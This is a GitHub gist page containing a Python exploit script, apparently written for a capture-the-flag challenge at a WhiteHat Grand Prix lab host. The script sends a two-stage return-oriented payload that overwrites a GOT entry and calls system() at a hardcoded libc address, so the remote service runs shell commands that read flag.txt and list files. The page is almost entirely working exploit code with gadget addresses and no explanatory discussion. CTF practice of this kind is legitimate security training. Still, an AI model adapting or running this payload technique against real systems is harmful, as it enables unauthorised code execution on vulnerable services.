Skip to content

Instantly share code, notes, and snippets.

@peternguyen93
Created October 28, 2015 02:40
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save peternguyen93/f4e9bf786c2df2ab968f to your computer and use it in GitHub Desktop.
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import time
# p = Pwn(host='lab9b.grandprix.whitehatvn.com',port=1337)
# p = Pwn(port=1337)
def exploit():
cmd = 'cat flag.txt >&4;ls -lia >&4;'
# raw_input('Debug>')
base = 0xF7E27000
# system_offset = 0x4056f
while 1:
p = Pwn(host='lab9b.grandprix.whitehatvn.com',port=1337)
p.connect()
print '[+] Base',hex(base)
stage1 = p.pack(0x08048892) # read more byte
stage1+= p.pack(0x080488e7) # mov eax, 0 ; leave ; ret
stage1+= 'D'*4
stage1+= p.pack(0x08048c0f) # ret
stage1+= 'A'*21 + '\x00'
stage1+= '\x18\xa0' # overwrite free_got
stage2 = 'A'*46
stage2+= p.pA([
0x08048600,
0x08048bfd, # pop esi ; pop edi ; pop ebp ; ret
4,
0x0804A078, # read cmd
len(cmd),
base + 261328,# base + system_offset,
0x41414141,
0x0804A078, # cmd
])
p.send(stage1)
# time.sleep(1)
p.send(stage2)
time.sleep(2)
p.send(cmd)
p.io()
break
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment